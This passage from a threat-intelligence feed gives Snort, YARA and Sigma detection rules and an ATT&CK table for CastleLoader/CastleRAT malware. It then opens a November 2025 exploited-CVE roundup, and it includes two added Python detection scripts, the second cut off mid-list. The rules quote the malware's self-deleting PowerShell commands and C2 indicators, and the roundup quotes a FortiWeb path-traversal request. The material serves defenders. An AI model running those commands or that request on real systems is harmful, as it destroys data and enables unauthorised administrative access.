alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:19,norm; content:"|2F|line|2F 3F|fields|3D|16385"; http_uri; depth:19; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460315; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147457"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460316; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147505"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460317; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server; content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147489"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_header; depth:48; reference:url,https://tria.ge/251028-27bcds1nbk; classtype:trojan-activity; sid:52460333; rev:1; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix K: Snort Rules for Matanbuchus</h2>
        <div>
          <div>
            <div>
              <pre><code>alert udp $EXTERNAL_NET any -&gt; $HOME_NET any (msg:"Matanbuchus Loader Inbound DNS Tunneled Data ACK"; content:"|AA AA 85 80 00 01 00 01 00 00 00 00 01 30 14|"; fast_pattern; depth:15; content:"|10|"; distance:20; within:1; content:"|00 10 00 01 00 00 00 3C 00 03 02|ok"; distance:0; isdataat:!1,relative; reference:url,https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up; reference:url,https://tria.ge/250716-b5sksa1wgt; sid:52460327; rev:1; metadata:author MGUT, created_at 2025-09-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Matanbuchus Loader Malware Outbound C2 Communication"; flow:established,to_server; content:"POST|20|"; depth:5; content:"|2E|php"; distance:0; content:"1|0D 0A|User-Agent|3A 20|"; distance:0; content:"Host|3A 20|"; distance:0; content:"Content-Length|3A 20|"; distance:0; content:"Content-Type|3A 20|application|2F|x-www-form-urlencoded|0D 0A|Accept-Language|3A 20|"; distance:0; content:"|0D 0A 0D 0A|"; content:!"|26|"; distance:0; content:"|3D|ey"; fast_pattern; distance:0; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost[^\x0d]+\x0d\x0aContent\x2dLength[^\x0d]+\x0d\x0aContent\x2dType[^\x0d]+\x0d\x0aAccept\x2dLanguage[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://tria.ge/240328-t4ge8sbf65; classtype:bad-unknown; sid:52460167; rev:1; metadata:author MGUT, created_at 2024-03-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix L: Yara Rule for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleLoader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-06"
        description = "Detection of the CastleLoader malware executable"
        version = "1.0"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        hash = "1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156"
        hash = "202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04"
        hash = "25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04"
        hash = "b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2"
        hash = "fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c"
        hash = "6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783"
        malware = "CastleLoader"
        malware_id = "8RF9P9"
        category = "MALWARE"
    strings:
        $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }
        $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }
        $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }
        $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW
        $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError
        $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap
        $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess
    condition:
        uint16(0) == 0x5A4D and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix M: Yara Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleRAT_Python {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the python variant of CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a"
        hash = "53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $cmd1 = "S_CONNECT" fullword
        $cmd2 = "S_COMMAND" fullword
        $cmd3 = "S_PING" fullword
        $cmd4 = "S_CMD" fullword
        $cmd5 = "S_DELETE" fullword
        $cmd6 = "S_POWERSHELL" fullword
        $cmd7 = "S_START_TERMINAL" fullword
        $cmd8 = "S_SESSION_MESSAGE" fullword
        $cmd9 = "S_UPLOAD" fullword
        $fun1 = "CheckElevation():" fullword
        $fun2 = "GetHWID("
        $fun3 = "GetOS("
        $fun4 = "GetIpGeo("
        $fun5 = "rc4createkeyA("
        $fun6 = "EncryptDecryptBufA("
        $fun7 = "RecvTimeout("
        $fun8 = "Send("
        $fun9 = "Connect("
        $fun10 = "ThreadPing("
        $fun11 = "ThreadRecvTerminal("
        $fun12 = "ThreadTerminalSession("
        $fun13 = "ThreadUploadFile("
        $fun14 = "SelfDelete()" fullword
    condition:
        filesize &lt; 50KB and
        7 of ($cmd*) and
        10 of ($fun*)
}

rule MAL_CastleRAT_C {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the C variant of CastleRAT malware"
        version = "2.0"
        reference = "https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75"
        hash = "e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928"
        hash = "67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b"
        hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
        hash = "60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0"
        hash = "cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $log_tag1 = "clipboardlog.txt" fullword wide
        $log_tag2 = "keylog.txt" fullword wide
        $wnd_class1 = "IsabellaWine" fullword wide
        $wnd_class2 = "camera!" fullword wide
        $log_fmt1 = "[%02d:%02d %02d.%02d.%02d] %ws" fullword wide
        $log_fmt2 = "[%02d:%02d %02d.%02d.%02d] " fullword wide
        $log_fmt3 = "[%02d.%02d.%02d %02d:%02d] " fullword wide
        $s1 = "(VPN)" wide ascii
        $s2 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61" wide
        $s3 = "\"%ws\" -no-deelevate" fullword wide
        $s4 = "IsWindowVisible" fullword ascii
        $s5 = "UAC_InputIndicatorOverlayWnd" fullword wide
        $s6 = "www.ip-api.com" fullword wide
        $s7 = "MachineGuid" fullword wide
        $s8 = "line/?fields=" wide
        $s9 = "C:\\Windows\\System32\\cmd.exe" wide
        $s10 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" fullword wide
    condition:
        uint16(0) == 0x5a4d and
        any of ($log_tag*) and
        any of ($wnd_class*) and
        any of ($log_fmt*) and
        all of ($s*)
}

rule MAL_CastleRAT_Shellcode_Loader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-10-20"
        description = "Detection of a python based shellcode loader that runs CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        hash = "058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7"
        hash = "190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836"
        malware = "CastleRAT"
        actor = "TAG-150"
        actor_id = "9nk6DO"
        category = "MALWARE"
        malware_id = "9WCga-"
    strings:
        $s1 = "SHELL64_OFFSET = "
        $s2 = "SHELL32_OFFSET = "
        $s3 = "SHELLFUNC = WINFUNCTYPE"
        $s4 = "LoadPE_Shell"
        $s5 = "crt = WinDLL(\"msvcrt.dll\");"
        $s6 = "OPEN_EXISTING" fullword
        $s7 = ".VirtualProtect("
        $s8 = "offset"
        $s9 = "from ctypes"
    condition:
        filesize &lt; 50KB and $s9 at 0 and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix N: CastleRAT Sigma Rules</h2>
        <div>
          <div>
            <div>
              <pre><code>title: CastleRAT C Variant Malware Log File Creation
id: 4d785ac8-17fe-4765-b427-9a31073ad1a7
status: stable
description: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stealer.
references:
  - https://tria.ge/250701-v6911aykv9
  - https://tria.ge/251101-r8f9xstjap
author: Insikt Group, Recorded Future
date: 2025-08-29
level: high
tags:
  - attack.t1608 # Stage Capabilities
  - attack.t1074.001 # Local Data Staging
  - attack.t1115 # Clipboard Data
  - attack.t1056.001 # Keylogging
logsource:
  product: windows
  category: file_event
detection:
  castlerat_logs:
    TargetFilename|endswith:
      - '\AppData\Local\Temp\MuuuuuhGer3'
      - '\AppData\Local\Temp\PluhhSuk3'
      - '\AppData\Local\Temp\AsdDsaHaha3'
      - '\AppData\Local\Temp\ChuChuka'
      - '\AppData\Local\Temp\GagikMaraguiSS'
      - '\AppData\Local\Temp\LowUshrSudujes'
      - '\AppData\Local\Temp\RarnuiKarta'
      - '\AppData\Local\Temp\GrazGraznii'
      - '\AppData\Local\Temp\GiveGvein3'
      - '\AppData\Local\Temp\BeruiowdgsouiHTR'
      - '\AppData\Local\Temp\GDSongdsgndohSDU'
      - '\AppData\Local\JohniiDepp'
      - '\AppData\Local\LuchiiSvet'
      - '\AppData\Local\HmmMaybe'
  condition: castlerat_logs
falsepositives:
  - Unlikely

title: CastleRAT Python Malware Self Deletion
id: 1050a0c4-1110-4b55-938c-0d27259ddd1e
status: stable
description: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/250822-r3a6qaak2t
author: Insikt Group, Recorded Future
date: 2025-08-28
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

title: CastleRAT C Malware Self Deletion
id: 79268bc8-3220-447d-bc7a-02199bed58e9
status: stable
description: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/251101-lh19hstqft/behavioral2
author: Insikt Group, Recorded Future
date: 2025-11-06
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity
</code></pre>
            </div>
          </div>
        </div>
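<p>As an added illustration (not part of the Insikt Group report or its rules), the following Python applies the three Sigma rules above to constructed Sysmon-style events; the event layout and sample values are assumptions, and string matching is treated as case-insensitive, the Sigma default when the <code>cased</code> modifier is absent.</p>

```python
# Added example, not from the Insikt Group report: a minimal matcher for the
# three CastleRAT Sigma rules, run over constructed Sysmon-style events.
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Optional

# Command-line suffixes copied from the two process_creation rules.
SELF_DELETE_RULES = {
    "CastleRAT Python Malware Self Deletion":
        "powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit",
    "CastleRAT C Malware Self Deletion":
        "powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force",
}

# Log file paths copied from the file_event rule.
LOG_FILE_SUFFIXES = (
    r"\AppData\Local\Temp\MuuuuuhGer3",
    r"\AppData\Local\Temp\PluhhSuk3",
    r"\AppData\Local\Temp\AsdDsaHaha3",
    r"\AppData\Local\Temp\ChuChuka",
    r"\AppData\Local\Temp\GagikMaraguiSS",
    r"\AppData\Local\Temp\LowUshrSudujes",
    r"\AppData\Local\Temp\RarnuiKarta",
    r"\AppData\Local\Temp\GrazGraznii",
    r"\AppData\Local\Temp\GiveGvein3",
    r"\AppData\Local\Temp\BeruiowdgsouiHTR",
    r"\AppData\Local\Temp\GDSongdsgndohSDU",
    r"\AppData\Local\JohniiDepp",
    r"\AppData\Local\LuchiiSvet",
    r"\AppData\Local\HmmMaybe",
)
LOG_FILE_RULE = "CastleRAT C Variant Malware Log File Creation"


@dataclass
class Event:
    """Constructed Sysmon-style event: a Sigma logsource category plus fields."""
    category: str
    fields: dict = field(default_factory=dict)


def endswith_ci(value: str, suffix: str) -> bool:
    """Sigma `|endswith` semantics: case-insensitive suffix match."""
    return value.lower().endswith(suffix.lower())


def match_self_delete(event: Event) -> Optional[str]:
    """Return the matching self-deletion rule title, or None."""
    if event.category != "process_creation":
        return None
    cmd = event.fields.get("CommandLine", "")
    for title, suffix in SELF_DELETE_RULES.items():
        if endswith_ci(cmd, suffix):
            return title
    return None


def match_log_file(event: Event) -> bool:
    """file_event rule: TargetFilename ends with one of the known log paths."""
    if event.category != "file_event":
        return False
    name = event.fields.get("TargetFilename", "")
    return any(endswith_ci(name, s) for s in LOG_FILE_SUFFIXES)


def scan(events: list) -> list:
    """Apply all three rules; return (event index, rule title) per hit."""
    hits = []
    for i, ev in enumerate(events):
        title = match_self_delete(ev)
        if title:
            hits.append((i, title))
        if match_log_file(ev):
            hits.append((i, LOG_FILE_RULE))
    return hits


# Constructed sample events (not taken from any real incident).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event("process_creation", {"Image": PS, "CommandLine":
          "powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit"}),
    Event("process_creation", {"Image": PS, "CommandLine":
          "POWERSHELL Start-Sleep -Seconds 3; Remove-Item -Path * -Force"}),
    Event("process_creation", {"Image": PS, "CommandLine":
          "powershell Get-Process"}),  # benign
    Event("file_event", {"TargetFilename":
          r"C:\Users\alice\AppData\Local\Temp\MuuuuuhGer3"}),
    Event("file_event", {"TargetFilename":
          r"C:\Users\alice\AppData\Local\Temp\setup.log"}),  # benign
]

if __name__ == "__main__":
    # The rules are exact suffixes: a changed sleep value alone misses both.
    for idx, title in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {title}")
```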
        <h2>Appendix O: MITRE ATT&amp;CK Techniques</h2>
        <div>
          <div>
            <div><strong>Tactic: Technique</strong></div>
            <div><strong>ATT&amp;CK Code</strong></div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Phishing</div>
            <div>T1566</div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Drive-by Compromise</div>
            <div>T1189</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious File</div>
            <div>T1204.002</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious Copy and Paste</div>
            <div>T1204.004</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: PowerShell</div>
            <div>T1059.001</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: AutoHotKey &amp; AutoIT</div>
            <div>T1059.010</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Domains</div>
            <div>T1583.001</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Virtual Private Server</div>
            <div>T1583.003</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Server</div>
            <div>T1583.004</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Access</div>
            <div>T1650</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Obtain Capabilities: Tool</div>
            <div>T1588.002</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Compromise Accounts: Email Accounts</div>
            <div>T1586.002</div>
          </div>
          <div>
            <div><strong>Defense Evasion:</strong> Masquerading</div>
            <div>T1036</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Proxy: External Proxy</div>
            <div>T1090.002</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Application Layer Protocol: Web Protocols</div>
            <div>T1071.001</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Ingress Tool Transfer</div>
            <div>T1105</div>
          </div>
          <div>
            <div><strong>Collection:</strong> Data from Local System</div>
            <div>T1005</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_171fa690104f0a5274fe66bfe605332a13a3fc906.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October]]></title>
            <link>https://www.recordedfuture.com/ko/blog/november-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/november-2025-cve-landscape</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[November 2025 CVE landscape: 10 exploited critical vulnerabilities, a 69% drop from October, and why Fortinet and Samsung flaws need urgent patching.]]></description>
            <content:encoded><![CDATA[
        <p>November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>10 vulnerabilities</strong> requiring immediate attention, <a href="https://www.recordedfuture.com/ko/blog/october-2025-cve-landscape">down from 32 in October</a>.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Fortinet leads concerns:</strong> Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation</li>
          <li><strong>LANDFALL spyware campaign:</strong> Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks</li>
          <li><strong>Public exploits proliferate:</strong> Seven of ten vulnerabilities have public proof-of-concept code available</li>
          <li><strong>OS Command Injection and Out-of-bounds Write</strong> were tied as the most common weakness types</li>
        </ul>
        <p><strong>Bottom line:</strong> The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.</p>
        <h2>Quick Reference: November 2025 Vulnerability Table</h2>
        <p><em>All 10 vulnerabilities below were actively exploited in November 2025.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAWo-07/overview">CVE-2025-12480</a></div>
            <div>99</div>
            <div>Gladinet Triofox</div>
            <div>CWE-284 (Improper Access Control)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAY-aVO/overview">CVE-2025-62215</a></div>
            <div>99</div>
            <div>Microsoft Windows 10 and 11; Microsoft Windows Server 2019, 2022, and 2025</div>
            <div>CWE-362 (Race Condition), CWE-415 (Double Free)</div>
            <div><a href="https://github.com/search?q=%22CVE-2025-62215%22&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAgNrn4/overview">CVE-2025-64446</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-23 (Relative Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-64446&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAnoPpx/overview">CVE-2025-13223</a></div>
            <div>99</div>
            <div>Google Chrome</div>
            <div>CWE-843 (Type Confusion)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BApQp8P/overview">CVE-2025-58034</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-58034&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/_ob8BJ/overview">CVE-2025-61757</a></div>
            <div>99</div>
            <div>Oracle Identity Manager</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2025-61757&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-R66PT/overview">CVE-2025-9242</a></div>
            <div>99</div>
            <div>WatchGuard Fireware OS</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/search?q=CVE-2025-9242&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-HNHUv/overview">CVE-2025-21042</a></div>
            <div>99</div>
            <div>Samsung Mobile Devices</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/B1ack4sh/Blackash-CVE-2025-21042">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6VoCY0/overview">CVE-2025-48703</a></div>
            <div>99</div>
            <div>CentOS Web Panel</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-48703&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/iwWgRF/overview">CVE-2021-26829</a></div>
            <div>99</div>
            <div>OpenPLC ScadaBR</div>
            <div>CWE-79 (Improper Neutralization of Input During Web Page Generation [Cross-site Scripting])</div>
            <div>No</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in November based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends: November 2025</h2>
        <h3>Vendors Most Affected</h3>
        <ul>
          <li><strong>Fortinet</strong> dominated with two critical FortiWeb vulnerabilities, both enabling remote exploitation</li>
          <li><strong>Microsoft</strong> faced a kernel-level race condition affecting all modern Windows versions</li>
          <li><strong>Samsung</strong> saw the weaponization of an image processing vulnerability for sophisticated mobile attacks</li>
          <li>Additional affected vendors: Gladinet, Google, Oracle, WatchGuard, CentOS, and Autonomy (OpenPLC)</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for first)</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write (tied for first)</li>
          <li><strong>CWE-284</strong> – Improper Access Control</li>
          <li><strong>CWE-362</strong> – Race Condition</li>
          <li><strong>CWE-306</strong> – Missing Authentication for Critical Function</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>LANDFALL Android spyware campaign</strong> marked November's most sophisticated operation:</p>
        <ul>
          <li>Exploited <strong>CVE-2025-21042</strong> for zero-click remote code execution on Samsung devices</li>
          <li>Targeted Middle Eastern countries (Iraq, Iran, Turkey, Morocco) with commercial-grade spyware</li>
          <li>Deployed via weaponized DNG image files through WhatsApp</li>
          <li>Achieved persistent device compromise without user interaction</li>
          <li>Demonstrated advanced anti-analysis and SELinux bypass capabilities</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-64446 | Fortinet FortiWeb</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added November 14, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.</p>
        <p><strong>Affected versions:</strong> FortiWeb 8.0.0-8.0.1, 7.6.0-7.6.4, 7.4.0-7.4.9, 7.2.0-7.2.11, 7.0.0-7.0.11</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Fortinet's security updates (8.0.2, 7.6.5, 7.4.10, 7.2.12, or 7.0.12)</li>
          <li>Monitor for POST requests to <code>/api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi</code></li>
          <li>Check for unauthorized admin accounts created since October 2025</li>
          <li>Review logs for Base64-encoded CGIINFO headers</li>
          <li>Disable HTTP/HTTPS on internet-facing interfaces if patching is delayed</li>
        </ul>
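<p>As an added example (not from Recorded Future or Fortinet), the following Python applies the two log indicators listed above, the traversal path ending in <code>/cgi-bin/fwbcgi</code> and a Base64-encoded <code>CGIINFO</code> header, to constructed request records; the record layout and sample values are assumptions, since real FortiWeb log fields differ.</p>

```python
# Added example, not from Recorded Future or Fortinet: flag request records
# that carry the CVE-2025-64446 indicators named in the advisory text.
import base64
import binascii
from urllib.parse import unquote

# Indicators quoted from the advisory text.
TARGET_CGI = "/cgi-bin/fwbcgi"
KNOWN_PATH = "/api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi"


def is_traversal_to_fwbcgi(raw_uri: str) -> bool:
    """True when the percent-decoded path uses '..' and lands on fwbcgi."""
    path = unquote(raw_uri.split("#", 1)[0])
    return "/../" in path and path.rstrip("/").endswith(TARGET_CGI)


def has_base64_cgiinfo(headers: dict) -> bool:
    """True when a CGIINFO header is present and is well-formed Base64.

    Presence of the header at all is the real signal; the Base64 check only
    filters obvious noise, since many short strings decode as Base64.
    """
    value = next((v for k, v in headers.items() if k.lower() == "cgiinfo"), "")
    if not value:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def classify(record: dict) -> str:
    """Return 'high', 'medium' or 'none' for one request record."""
    is_post = record.get("method", "").upper() == "POST"
    traversal = is_traversal_to_fwbcgi(record.get("uri", ""))
    cgiinfo = has_base64_cgiinfo(record.get("headers", {}))
    if is_post and traversal and cgiinfo:
        return "high"
    if traversal or cgiinfo:
        return "medium"
    return "none"


def scan_requests(records: list) -> list:
    """Return (index, verdict) for every record that is not 'none'."""
    out = []
    for i, rec in enumerate(records):
        verdict = classify(rec)
        if verdict != "none":
            out.append((i, verdict))
    return out


# Constructed request records (assumed layout; not real FortiWeb log lines).
SAMPLE_REQUESTS = [
    {"method": "POST", "uri": KNOWN_PATH,
     "headers": {"Host": "fortiweb.example",
                 "CGIINFO": base64.b64encode(b"constructed-placeholder").decode()}},
    {"method": "POST", "uri": KNOWN_PATH,
     "headers": {"Host": "fortiweb.example"}},  # traversal, no header
    {"method": "GET", "uri": "/api/v2.0/system/status",
     "headers": {"Host": "fortiweb.example"}},  # benign API call
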